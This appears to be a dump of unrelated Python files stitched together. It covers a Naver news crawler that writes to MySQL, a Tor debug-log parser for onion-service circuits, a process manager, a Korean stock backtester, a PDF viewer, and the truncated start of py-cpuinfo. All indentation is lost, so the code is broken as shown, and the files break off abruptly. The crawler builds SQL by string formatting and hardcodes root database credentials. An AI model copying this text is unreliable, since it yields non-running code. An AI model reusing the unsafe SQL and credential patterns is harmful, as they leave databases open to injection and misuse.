unittest.main(verbosity=2)
|
crawling_to_db.py
|
from selenium import webdriver
import pandas as pd
from datetime import datetime
from multiprocessing import Process
from os import makedirs as mk
from os import path as pt
from os import listdir
from os.path import isfile, join
import time
import MySQLdb as db
import sys
def crawling(area,driver, count, cur_time):
articles = driver.find_element_by_css_selector('#section_body')
article_list = articles.find_elements_by_css_selector(
'dl > dt:nth-child(2) > a')
href_list = [each.get_attribute('href') for each in article_list]
title_list = [each.text for each in article_list]
for idx, article in enumerate(href_list):
driver.get(article)
article_body = driver.find_element_by_id('articleBodyContents')
time.sleep(0.5)
posted_time = driver.find_element_by_class_name('t11')
content = article_body.text
file_name = '{}/{}-{}.txt'.format(area, count,
posted_time.text.replace(':', '-'))
dest_path = '{}/{}/{}'.format('crawling',cur_time, file_name)
with open(dest_path, 'w', encoding='UTF-8') as f:
title = '\t'+title_list[idx] + '\n\n'
f.write(title + content)
count += 1
return count
def get_page_buttons(driver):
page_buttons = driver.find_elements_by_class_name('_paging')
return [each.get_attribute('href') for each in page_buttons]
def how_many_pages_to_crawl(area, driver,cur_time, count, page_counts):
if page_counts == 0:
print('Insert more than 0')
return
buttons = get_page_buttons(driver)
count += crawling(area,driver,count, cur_time)
page_counts -= 1
print('\t','remaining page = ' + str(page_counts))
idx = 0
while page_counts:
# idx 페이지로 이동
driver.get(buttons[idx])
# 다음 버튼이면
if idx == 9:
buttons = get_page_buttons(driver,)
idx = 0
count += crawling(area,driver,count,cur_time)
# 다음 버튼이 아니면
else:
count += crawling(area,driver,count,cur_time)
idx += 1
page_counts -= 1
print('\t','remaining page = ' + str(page_counts))
return count
def do_job(area, cur_time, how_many_pages = 20):
options = webdriver.ChromeOptions()
options.add_argument('headless')
options.add_argument("--disable-gpu")
options.add_argument('log-level=3')
driver = webdriver.Chrome('chromedriver.exe', chrome_options=options)
count = 0
for each in area:
area_link = each[0]
area_str = each[1]
driver.get(area_link)
print(area_str,' Crawling Started')
count = how_many_pages_to_crawl(area_str, driver, cur_time, count ,how_many_pages)
print('\t','counts of crawling = ',count)
count = 0
def mk_dir(new_path):
path = ['정치','경제','사회','세계','생활문화','IT과학']
if not pt.exists(new_path):
mk(new_path)
for area in path:
mk('{}/{}'.format(new_path,area))
def trimming(file_name):
# 1. 역순으로 제일 먼저 찾은 이메일 밑으로 다 없앰
# 2. 나머지 특수문자들 다 없앰 (. 빼고)
# 3. 공백문자열 다 없앰
import re
with open(file_name,'r',encoding='utf8') as f:
articles = f.readlines()
# 1.
is_email = []
for each in articles:
tmp = re.findall('[^@]+@[^@]+\.[^@]+', each)
is_email.append(tmp)
is_email = [True if len(each)!=0 else False for each in is_email]
upper_bound = len(is_email) - 2 - is_email[::-1].index(True) if True in is_email else len(is_email)-1
articles = [articles[idx] if not is_email[idx] else '' for idx in range(0,upper_bound)]
# 2.
for idx, val in enumerate(articles):
converted = re.sub('[^가-힣0-9a-zA-Z.\\s]', ' ', val)
articles[idx] = converted
# 3.
articles = [each for each in articles if each != '']
return articles
def raw_to_preprocessed(folder_name):
path = ['정치','경제','사회','세계','생활문화','IT과학']
print('Preprocess Started')
for each in path:
crawling_path = '{}/{}/{}'.format('crawling',folder_name,each)
file_names = [f for f in listdir(crawling_path) if isfile(
join(crawling_path, f)) and f.endswith(".txt")]
# 파일이름
full_names = ['{}/{}'.format(each, tmp) for tmp in file_names]
# 영역/파일이름
crawling_path = ['{}/{}/{}'.format('crawling',folder_name, tmp) for tmp in full_names]
# crawling/영역/파일이름
for idx, file_name in enumerate(crawling_path):
trimmed = trimming(file_name)
trimmed = ''.join(trimmed)
dest_path = '{}/{}/{}'.format('preprocess',folder_name,full_names[idx])
with open(dest_path, 'w', encoding='utf-8') as f:
f.write(trimmed)
print('\t',each, ' completed !')
print('Preprocess Completed\n')
def load_whole_preprocessed(folder_name):
path = [('정치',0), ('경제',1), ('사회',2), ('세계',3), ('생활문화',4), ('IT과학',5)]
total_df = pd.DataFrame(columns=['content','area'])
def date_trimmer(raw_date):
tmp = raw_date.split('/')[-1].replace('.txt',':00')
tmp = tmp.split()
return '-'.join(tmp[0].split('-')[1:]) + ' ' + tmp[1].replace('-',':')
print('loading preprocessed started')
for each in path:
preprocess_path = '{}/{}/{}'.format('preprocess',folder_name,each[0])
file_names = [f for f in listdir(preprocess_path) if isfile(
join(preprocess_path, f)) and f.endswith(".txt")]
full_names = ['{}/{}'.format(preprocess_path, tmp) for tmp in file_names]
contents = []
written_date = []
df = pd.DataFrame(columns=['content','area'])
for file_name in full_names:
with open(file_name, 'r', encoding='utf-8') as f:
contents.append(f.read())
written_date.append(file_name)
df['content'] = pd.Series(contents)
df['area'] = each[1]
df['written_date'] = pd.Series(written_date)
df['written_date'] = df['written_date'].apply(date_trimmer)
df['title'] = df['content'].apply(lambda x: x.split('\n')[0].replace('\t',''))
df = df[['title','content','written_date','area']]
total_df = total_df.append(df)
print('\t',each,' completed !')
print('loading preprocessed completed\n')
return total_df
def preprocessed_to_db(data):
conn = db.connect(
'127.0.0.1',
'root',
'5555',
'news_rec',
charset='utf8')
print('Preprocessed to db started')
# article to DB
curs = conn.cursor()
for idx, val in data.iterrows():
area = val['area']
title = "'{}'".format(val['title'])
content = "'{}'".format(val['content'].replace('\n', ''))
date = "'{}'".format(val['written_date'])
sql = 'INSERT INTO Article(area, title, content, written_date) VALUES({},{},{},{});'.format(
area, title, content, date)
curs.execute(sql)
conn.commit()
print('Preprocessed to db completed')
def do_crawl(how_many_pages):
politic = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=100'
economy = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=101'
society = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=102'
culture = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=103'
world = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=104'
science = 'http://news.naver.com/main/main.nhn?mode=LSD&mid=shm&sid1=105'
area = [(politic, '정치'), (economy, '경제'), (society, '사회'),
(culture, '생활문화'), (world, '세계'), (science, 'IT과학')]
p1 = Process(target=do_job, args=(area[:3],cur_time, how_many_pages))
p1.start()
p2 = Process(target=do_job, args=(area[3:],cur_time, how_many_pages))
p2.start()
while True:
time.sleep(5)
if p1.exitcode != None and p2.exitcode != None:
print('crawling completed !\n')
break
if __name__ == '__main__':
cur_time = datetime.now().strftime('%Y-%m-%d %H-%M-%S')
mk_dir('{}/{}'.format('crawling',cur_time))
how_many_pages = 20 if len(sys.argv)<=1 else int(sys.argv[1])
do_crawl(how_many_pages)
mk_dir('{}/{}'.format('preprocess',cur_time))
raw_to_preprocessed(cur_time)
preprocessed_to_db(load_whole_preprocessed(cur_time))
|
logParser.py
|
import threading, queue, re, time
DEBUG_LOG_PATH = '/var/log/tor/debug.log'
INTRO_ESTABLISHED_REGEX = '([A-Za-z]{2,3} [0-9]{1,2} [0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}.[0-9]{0,}) \[info\] service_handle_intro_established\(\): Successfully received an INTRO_ESTABLISHED cell on circuit ([0-9]{1,}) \(id: ([0-9]{1,})\)'
START_SERVICE_NON_EPHEMERAL_REGEX = 'build_descriptors_for_new_service\(\): Hidden service ([a-z0-9]{56})'
START_SERVICE_EPHEMERAL_REGEX = 'hs_service_add_ephemeral\(\): Added ephemeral v[0-9] onion service: ([a-z0-9]{0,})'
# synchronized queue to get results back from thread
circuit_queue = queue.Queue()
def extractCircuitID(line):
circuit_id = re.search(INTRO_ESTABLISHED_REGEX, str(line))
# if there is a match, extract the circuit ID
if circuit_id is not None:
return [circuit_id.group(1), circuit_id.group(3)]
else:
return None
def parseLog(file_path, circuit_queue):
with open(file_path) as infile:
for line in infile:
circuit_id = extractCircuitID(line)
if circuit_id is not None:
# we found a circuit ID from an introduction circuit
circuit_queue.put(circuit_id)
def startParsing():
if circuit_queue.empty():
log_t = threading.Thread(target=parseLog, args=(DEBUG_LOG_PATH, circuit_queue))
log_t.start()
log_t.join()
return list(circuit_queue.queue)
|
utils.py
|
#! coding=utf-8
__author__ = "Sriram Murali Velamur<sriram@likewyss.com>"
__all__ = ("ProcessManager",)
import sys
sys.dont_write_bytecode = True
from multiprocessing import Process, cpu_count, Pool
from time import sleep
import random
from types import FunctionType
class ProcessManager(object):
def __init__(self, slot_size=cpu_count()):
_count = cpu_count()
self.slot_size = slot_size if isinstance(slot_size, int) and \
slot_size < _count else _count
self.slots = []
self.buffer = []
self.callback_map = {}
self.response_map = {}
self.started = False
self.pool = Pool()
def add(self, handler, args=None, kwargs=None, callback=None):
args = args if isinstance(args, (list, tuple)) else ()
kwargs = kwargs if isinstance(kwargs, dict) else {}
callback = callback if isinstance(
callback, FunctionType) else None
_process = Process(target=handler, args=args, kwargs=kwargs)
if len(self.slots) < self.slot_size:
self.slots.append(_process)
else:
self.buffer.append(_process)
self.callback_map[_process] = callback
def start(self):
self.started = True
[item.start() for item in self.slots if not item.is_alive()
and item._popen is None]
while 1:
for item in self.slots:
if item._popen and not item.is_alive():
self.slots.remove(item)
item.terminate()
_callback = self.callback_map.get(item)
if _callback:
_callback()
if len(self.slots) < self.slot_size:
if self.buffer:
_item = self.buffer[0]
self.slots.append(_item)
self.buffer.remove(_item)
_item.start()
if not self.slots and not self.buffer:
break
else:
sleep(0.001)
def apply(self, iterable_call):
[self.add(*item) for item in iterable_call]
if not self.started:
self.start()
if __name__ == '__main__':
def test(x):
return (a**2 for a in x)
manager = ProcessManager()
manager.apply(
[(test, (range(1, random.randint(1, 10000)),))
for x in range(1, 20)])
|
backtester_vj_jj.py
|
import os
import sys
import sqlite3
import datetime
import pandas as pd
from matplotlib import gridspec
from matplotlib import pyplot as plt
from multiprocessing import Process, Queue
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from utility.setting import DB_TICK, DB_BACKTEST
from utility.static import strf_time, strp_time, timedelta_sec, timedelta_day
BETTING = 20000000 # 종목당 배팅금액
STARTDAY = 0 # 시작날짜(일전)
TESTPERIOD = 14 # 백스팅할 기간 : 시작날짜 기준 이전 기간
START_TIME = 100000
END_TIME = 153000
MULTI_COUNT = 6
class BackTesterVj:
def __init__(self, q_, code_list_, num_, df2_):
self.q = q_
self.code_list = code_list_
self.df_mt = df2_
self.gap_ch = num_[0]
self.avg_time = num_[1]
self.gap_sm = num_[2]
self.ch_low = num_[3]
self.dm_low = num_[4]
self.per_low = num_[5]
self.per_high = num_[6]
self.sell_ratio = num_[7]
self.code = None
self.df = None
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buytime = None
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.highper = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
self.Start()
def Start(self):
conn = sqlite3.connect(DB_TICK)
tcount = len(self.code_list)
end_day_dt = timedelta_day(-STARTDAY)
end_day = int(strf_time('%Y%m%d', end_day_dt))
start_day = int(strf_time('%Y%m%d', timedelta_day(-TESTPERIOD, end_day_dt)))
for k, code in enumerate(self.code_list):
self.code = code
self.df = pd.read_sql(f"SELECT * FROM '{code}'", conn).set_index('index')
self.df['고저평균대비등락율'] = (self.df['현재가'] / ((self.df['고가'] + self.df['저가']) / 2) - 1) * 100
self.df['고저평균대비등락율'] = self.df['고저평균대비등락율'].round(2)
self.df['직전체결강도'] = self.df['체결강도'].shift(1)
self.df['직전당일거래대금'] = self.df['당일거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['초당거래대금'] = self.df['당일거래대금'] - self.df['직전당일거래대금']
self.df['직전초당거래대금'] = self.df['초당거래대금'].shift(1)
self.df = self.df.fillna(0)
self.df['초당거래대금평균'] = self.df['직전초당거래대금'].rolling(window=self.avg_time).mean()
self.df['체결강도평균'] = self.df['직전체결강도'].rolling(window=self.avg_time).mean()
self.df['최고체결강도'] = self.df['직전체결강도'].rolling(window=self.avg_time).max()
self.df = self.df.fillna(0)
self.totalcount = 0
self.totalcount_p = 0
self.totalcount_m = 0
self.totalholdday = 0
self.totaleyun = 0
self.totalper = 0.
self.hold = False
self.buytime = None
self.buycount = 0
self.buyprice = 0
self.sellprice = 0
self.highper = 0
self.index = 0
self.indexb = 0
self.indexn = 0
self.ccond = 0
lasth = len(self.df) - 1
for h, index in enumerate(self.df.index):
if h != 0 and index[:8] != self.df.index[h - 1][:8]:
self.ccond = 0
if int(index[:8]) <= start_day or int(index[:8]) > end_day or \
(not self.hold and (END_TIME <= int(index[8:]) or int(index[8:]) < START_TIME)):
continue
self.index = index
self.indexn = h
if not self.hold and START_TIME < int(index[8:]) < END_TIME and self.BuyTerm():
self.Buy()
elif self.hold and START_TIME < int(index[8:]) < END_TIME and self.SellTerm():
self.Sell()
elif self.hold and (h == lasth or int(index[8:]) >= END_TIME > int(self.df.index[h - 1][8:])):
self.Sell()
self.Report(k + 1, tcount)
conn.close()
def BuyTerm(self):
try:
if type(self.df['현재가'][self.index]) == pd.Series or type(self.df_mt['거래대금순위'][self.index]) == pd.Series:
return False
if self.code not in self.df_mt['거래대금순위'][self.index]:
self.ccond = 0
else:
self.ccond += 1
except KeyError:
return False
if self.ccond < self.avg_time + 1:
return False
# 전략 비공개
return True
def Buy(self):
매도호가5 = self.df['매도호가5'][self.index]
매도호가4 = self.df['매도호가4'][self.index]
매도호가3 = self.df['매도호가3'][self.index]
매도호가2 = self.df['매도호가2'][self.index]
매도호가1 = self.df['매도호가1'][self.index]
매도잔량5 = self.df['매도잔량5'][self.index]
매도잔량4 = self.df['매도잔량4'][self.index]
매도잔량3 = self.df['매도잔량3'][self.index]
매도잔량2 = self.df['매도잔량2'][self.index]
매도잔량1 = self.df['매도잔량1'][self.index]
현재가 = self.df['현재가'][self.index]
매수수량 = int(BETTING / 현재가)
if 매수수량 > 0:
남은수량 = 매수수량
직전남은수량 = 매수수량
매수금액 = 0
호가정보 = {매도호가1: 매도잔량1}
for 매도호가, 매도잔량 in 호가정보.items():
남은수량 -= 매도잔량
if 남은수량 <= 0:
매수금액 += 매도호가 * 직전남은수량
break
else:
매수금액 += 매도호가 * 매도잔량
직전남은수량 = 남은수량
if 남은수량 <= 0:
예상체결가 = round(매수금액 / 매수수량, 2)
self.buyprice = 예상체결가
self.buycount = 매수수량
self.hold = True
self.indexb = self.indexn
self.buytime = strp_time('%Y%m%d%H%M%S', self.index)
self.q.put(self.index)
def SellTerm(self):
self.q.put(self.index)
if type(self.df['현재가'][self.index]) == pd.Series:
return False
bg = self.buycount * self.buyprice
cg = self.buycount * self.df['현재가'][self.index]
eyun, per = self.GetEyunPer(bg, cg)
if per > self.highper:
self.highper = per
# 전략 비공개
return False
def Sell(self):
매수호가1 = self.df['매수호가1'][self.index]
매수호가2 = self.df['매수호가2'][self.index]
매수호가3 = self.df['매수호가3'][self.index]
매수호가4 = self.df['매수호가4'][self.index]
매수호가5 = self.df['매수호가5'][self.index]
매수잔량1 = self.df['매수잔량1'][self.index]
매수잔량2 = self.df['매수잔량2'][self.index]
매수잔량3 = self.df['매수잔량3'][self.index]
매수잔량4 = self.df['매수잔량4'][self.index]
매수잔량5 = self.df['매수잔량5'][self.index]
남은수량 = self.buycount
직전남은수량 = 남은수량
매도금액 = 0
호가정보 = {매수호가1: 매수잔량1, 매수호가2: 매수잔량2, 매수호가3: 매수잔량3, 매수호가4: 매수잔량4, 매수호가5: 매수잔량5}
for 매수호가, 매수잔량 in 호가정보.items():
남은수량 -= 매수잔량
if 남은수량 <= 0:
매도금액 += 매수호가 * 직전남은수량
break
else:
매도금액 += 매수호가 * 매수잔량
직전남은수량 = 남은수량
if 남은수량 <= 0:
예상체결가 = round(매도금액 / self.buycount, 2)
self.sellprice = 예상체결가
self.hold = False
self.CalculationEyun()
self.highper = 0
self.indexb = 0
def CalculationEyun(self):
self.totalcount += 1
bg = self.buycount * self.buyprice
cg = self.buycount * self.sellprice
eyun, per = self.GetEyunPer(bg, cg)
self.totalper = round(self.totalper + per, 2)
self.totaleyun = int(self.totaleyun + eyun)
self.totalholdday += self.indexn - self.indexb
if per > 0:
self.totalcount_p += 1
else:
self.totalcount_m += 1
self.q.put([self.code, self.df.index[self.indexb], self.index, self.buyprice, self.sellprice, per, eyun])
# noinspection PyMethodMayBeStatic
def GetEyunPer(self, bg, cg):
gtexs = cg * 0.0023
gsfee = cg * 0.00015
gbfee = bg * 0.00015
texs = gtexs - (gtexs % 1)
sfee = gsfee - (gsfee % 10)
bfee = gbfee - (gbfee % 10)
pg = int(cg - texs - sfee - bfee)
eyun = pg - bg
per = round(eyun / bg * 100, 2)
return eyun, per
def Report(self, count, tcount):
if self.totalcount > 0:
plus_per = round((self.totalcount_p / self.totalcount) * 100, 2)
self.q.put([self.code, self.totalcount, self.totalholdday, self.totalcount_p, self.totalcount_m,
plus_per, self.totalper, self.totaleyun])
totalcount, totalholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun = \
self.GetTotal(plus_per, self.totalholdday)
print(f" 종목코드 {self.code} | 보유기간합계 {totalholdday}초 | 거래횟수 {totalcount}회 | "
f" 익절 {totalcount_p}회 | 손절 {totalcount_m}회 | 승률 {plus_per}% |"
f" 수익률 {totalper}% | 수익금 {totaleyun}원 [{count}/{tcount}]")
else:
self.q.put([self.code, 0, 0, 0, 0, 0., 0., 0])
def GetTotal(self, plus_per, totalholdday):
totalcount = str(self.totalcount)
totalcount = ' ' + totalcount if len(totalcount) == 1 else totalcount
totalcount = ' ' + totalcount if len(totalcount) == 2 else totalcount
totalholdday = str(totalholdday)
totalholdday = ' ' + totalholdday if len(totalholdday) == 1 else totalholdday
totalholdday = ' ' + totalholdday if len(totalholdday) == 2 else totalholdday
totalholdday = ' ' + totalholdday if len(totalholdday) == 3 else totalholdday
totalcount_p = str(self.totalcount_p)
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 1 else totalcount_p
totalcount_p = ' ' + totalcount_p if len(totalcount_p) == 2 else totalcount_p
totalcount_m = str(self.totalcount_m)
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 1 else totalcount_m
totalcount_m = ' ' + totalcount_m if len(totalcount_m) == 2 else totalcount_m
plus_per = str(plus_per)
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 1 else plus_per
plus_per = ' ' + plus_per if len(plus_per.split('.')[0]) == 2 else plus_per
plus_per = plus_per + '0' if len(plus_per.split('.')[1]) == 1 else plus_per
totalper = str(self.totalper)
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 1 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 2 else totalper
totalper = ' ' + totalper if len(totalper.split('.')[0]) == 3 else totalper
totalper = totalper + '0' if len(totalper.split('.')[1]) == 1 else totalper
totaleyun = format(self.totaleyun, ',')
if len(totaleyun.split(',')) == 1:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 2:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 2 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 3 else totaleyun
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 4 else totaleyun
elif len(totaleyun.split(',')) == 3:
totaleyun = ' ' + totaleyun if len(totaleyun.split(',')[0]) == 1 else totaleyun
return totalcount, totalholdday, totalcount_p, totalcount_m, plus_per, totalper, totaleyun
class Total:
def __init__(self, q_, last_, num_, df1_):
super().__init__()
self.q = q_
self.last = last_
self.name = df1_
self.gap_ch = num_[0]
self.avg_time = num_[1]
self.gap_sm = num_[2]
self.ch_low = num_[3]
self.dm_low = num_[4]
self.per_low = num_[5]
self.per_high = num_[6]
self.sell_ratio = num_[7]
self.Start()
def Start(self):
columns = ['거래횟수', '보유기간합계', '익절', '손절', '승률', '수익률', '수익금']
df_back = pd.DataFrame(columns=columns)
df_bct = pd.DataFrame(columns=['hold_count'])
df_tsg = pd.DataFrame(columns=['종목명', '매수시간', '매도시간', '매수가', '매도가', '수익률', 'sgm'])
k = 0
while True:
data = self.q.get()
if type(data) == str:
if data in df_bct.index:
df_bct.at[data] = df_bct['hold_count'][data] + 1
else:
df_bct.at[data] = 1
elif len(data) == 7:
name = self.name['종목명'][data[0]]
if data[2] in df_tsg.index:
df_tsg.at[data[2]] = df_tsg['종목명'][data[2]] + ';' + name, \
df_tsg['매수시간'][data[2]] + ';' + data[1], \
df_tsg['매도시간'][data[2]] + ';' + data[2], \
df_tsg['매수가'][data[2]] + ';' + str(data[3]), \
df_tsg['매도가'][data[2]] + ';' + str(data[4]), \
df_tsg['수익률'][data[2]] + ';' + str(data[5]), \
df_tsg['sgm'][data[2]] + data[6]
else:
df_tsg.at[data[2]] = name, data[1], data[2], str(data[3]), str(data[4]), str(data[5]), data[6]
else:
df_back.at[data[0]] = data[1], data[2], data[3], data[4], data[5], data[6], data[7]
k += 1
if k == self.last:
break
if len(df_back) > 0:
text = [self.gap_ch, self.avg_time, self.gap_sm, self.ch_low, self.dm_low, self.per_low, self.per_high, self.sell_ratio]
print(f' {text}')
df_back = df_back[df_back['거래횟수'] > 0]
tc = df_back['거래횟수'].sum()
if tc != 0:
pc = df_back['익절'].sum()
mc = df_back['손절'].sum()
pper = round(pc / tc * 100, 2)
avghold = round(df_back['보유기간합계'].sum() / tc, 2)
avgsp = round(df_back['수익률'].sum() / tc, 2)
tsg = int(df_back['수익금'].sum())
avgholdcount = round(df_bct['hold_count'].max(), 2)
onegm = int(BETTING * avgholdcount)
if onegm < BETTING:
onegm = BETTING
tsp = round(tsg / onegm * 100, 4)
text = f" 종목당 배팅금액 {format(BETTING, ',')}원, 필요자금 {format(onegm, ',')}원,"\
f" 거래횟수 {tc}회, 최대보유종목수 {avgholdcount}개, 평균보유기간 {avghold}초,\n 익절 {pc}회,"\
f" 손절 {mc}회, 승률 {pper}%, 평균수익률 {avgsp}%, 수익률합계 {tsp}%, 수익금합계 {format(tsg, ',')}원"
print(text)
conn = sqlite3.connect(DB_BACKTEST)
df_back.to_sql(f"vj_jj_code_{strf_time('%Y%m%d')}", conn, if_exists='append', chunksize=1000)
conn.close()
if len(df_tsg) == 0:
df_bct = pd.DataFrame(columns=['hold_count'])
if len(df_tsg) > 0:
df_tsg.sort_values(by=['매도시간'], inplace=True)
df_tsg['sgm_cumsum'] = df_tsg['sgm'].cumsum()
df_tsg[['sgm', 'sgm_cumsum']] = df_tsg[['sgm', 'sgm_cumsum']].astype(int)
df_bct['index'] = df_bct.index
df_bct.sort_values(by=['index'], inplace=True)
df_bct = df_bct.set_index('index')
conn = sqlite3.connect(DB_BACKTEST)
df_bct.to_sql(f"vj_jj_hold_{strf_time('%Y%m%d')}", conn, if_exists='append', chunksize=1000)
df_tsg.to_sql(f"vj_jj_time_{strf_time('%Y%m%d')}", conn, if_exists='append', chunksize=1000)
conn.close()
plt.figure(figsize=(12, 10))
gs = gridspec.GridSpec(nrows=2, ncols=1, height_ratios=[3, 1])
plt.subplot(gs[0])
plt.plot(df_tsg.index, df_tsg['sgm'], label='sgm')
plt.plot(df_tsg.index, df_tsg['sgm_cumsum'], label='sgm_cumsum')
plt.xticks([])
plt.legend(loc='best')
plt.grid()
plt.subplot(gs[1])
plt.plot(df_bct.index, df_bct['hold_count'], color='g', label='hold_count')
plt.xticks(list(df_tsg.index[::12]), rotation=45)
plt.legend(loc='best')
plt.tight_layout()
plt.show()
if __name__ == "__main__":
start = datetime.datetime.now()
con = sqlite3.connect(DB_TICK)
df = pd.read_sql("SELECT name FROM sqlite_master WHERE TYPE = 'table'", con)
df1 = pd.read_sql('SELECT * FROM codename', con).set_index('index')
df2 = pd.read_sql('SELECT * FROM moneytop', con).set_index('index')
con.close()
table_list = list(df['name'].values)
table_list.remove('moneytop')
table_list.remove('codename')
if 'dist' in table_list:
table_list.remove('dist')
if 'dist_chk' in table_list:
table_list.remove('dist_chk')
if 'sqlite_sequence' in table_list:
table_list.remove('sqlite_sequence')
if 'temp' in table_list:
table_list.remove('temp')
last = len(table_list)
if len(table_list) > 0:
gap_ch = 5.0
avg_time = 300
gap_sm = 50
ch_low = 90
dm_low = 30000
per_low = 5
per_high = 25
sell_ratio = 0.5
num = [gap_ch, avg_time, gap_sm, ch_low, dm_low, per_low, per_high, sell_ratio]
q = Queue()
w = Process(target=Total, args=(q, last, num, df1))
w.start()
procs = []
workcount = int(last / MULTI_COUNT) + 1
for j in range(0, last, workcount):
code_list = table_list[j:j + workcount]
p = Process(target=BackTesterVj, args=(q, code_list, num, df2))
procs.append(p)
p.start()
for p in procs:
p.join()
w.join()
end = datetime.datetime.now()
print(f" 백테스팅 소요시간 {end - start}")
|
pdf_viewer.py
|
import sys
from PyQt5 import QtWidgets
from multiprocessing import Process
from .window import Window
class PDFViewer:
"""
Viewer to show a PDF File
"""
def __init__(self, pdf, size):
"""
Initializes a pdf viewer for a certain pdf
:param pdf: pdf to be shown
"""
self._pdf = pdf
self._size = size
self._process = None
def open_pdf(self):
"""opens a window wiht the pdf in the background"""
self._process = Process(target=self._show_pdf, args=[self._pdf], name='ControlBlockDiagram')
self._process.start()
def close_pdf(self):
"""closes the window"""
self._process.kill()
def show_pdf(self):
"""opens a window with the pdf file"""
app = QtWidgets.QApplication(sys.argv)
window = Window(self._pdf, self._size)
window.show()
app.exec_()
@staticmethod
def _show_pdf(pdf, size=(800, 600)):
"""opens a window for a given pdf file"""
app = QtWidgets.QApplication(sys.argv)
window = Window(pdf, size)
window.show()
app.exec_()
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2020 Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (7, 0, 0)
CPUINFO_VERSION_STRING = '.'.join([str(n) for n in CPUINFO_VERSION])
import os, sys
import platform
import multiprocessing
import ctypes
IS_PY2 = sys.version_info[0] == 2
CAN_CALL_CPUID_IN_SUBPROCESS = True
g_trace = None
class Trace(object):
def __init__(self, is_active, is_stored_in_string):
self._is_active = is_active
if not self._is_active:
return
from datetime import datetime
if IS_PY2:
from cStringIO import StringIO
else:
from io import StringIO
if is_stored_in_string:
self._output = StringIO()
else:
date = datetime.now().strftime("%Y-%m-%d_%H-%M-%S-%f")
self._output = open('cpuinfo_trace_{0}.trace'.format(date), 'w')
self._stdout = StringIO()
self._stderr = StringIO()
self._err = None
def header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def success(self):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
self._output.write("Success ... ({0} {1})\n\n".format(file, line))
self._output.flush()
def fail(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[1]
file = frame[1]
line = frame[2]
if isinstance(msg, str):
msg = ''.join(['\t' + line for line in msg.split('\n')]) + '\n'
self._output.write(msg)
self._output.write("Failed ... ({0} {1})\n\n".format(file, line))
self._output.flush()
elif isinstance(msg, Exception):
from traceback import format_exc
err_string = format_exc()
self._output.write("\tFailed ... ({0} {1})\n".format(file, line))
self._output.write(''.join(['\t\t{0}\n'.format(n) for n in err_string.split('\n')]) + '\n')
self._output.flush()
def command_header(self, msg):
if not self._is_active: return
from inspect import stack
frame = stack()[3]
file = frame[1]
line = frame[2]
self._output.write("\t{0} ({1} {2})\n".format(msg, file, line))
self._output.flush()
def command_output(self, msg, output):
if not self._is_active: return
self._output.write("\t\t{0}\n".format(msg))
self._output.write(''.join(['\t\t\t{0}\n'.format(n) for n in output.split('\n')]) + '\n')
self._output.flush()
def keys(self, keys, info, new_info):
if not self._is_active: return
from inspect import stack
frame = stack()[2]
file = frame[1]
line = frame[2]
# List updated keys
self._output.write("\tChanged keys ({0} {1})\n".format(file, line))
changed_keys = [key for key in keys if key in info and key in new_info and info[key] != new_info[key]]
if changed_keys:
for key in changed_keys:
self._output.write('\t\t{0}: {1} to {2}\n'.format(key, info[key], new_info[key]))
else:
self._output.write('\t\tNone\n')
# List new keys
self._output.write("\tNew keys ({0} {1})\n".format(file, line))
new_keys = [key for key in keys if key in new_info and key not in info]
if new_keys:
for key in new_keys:
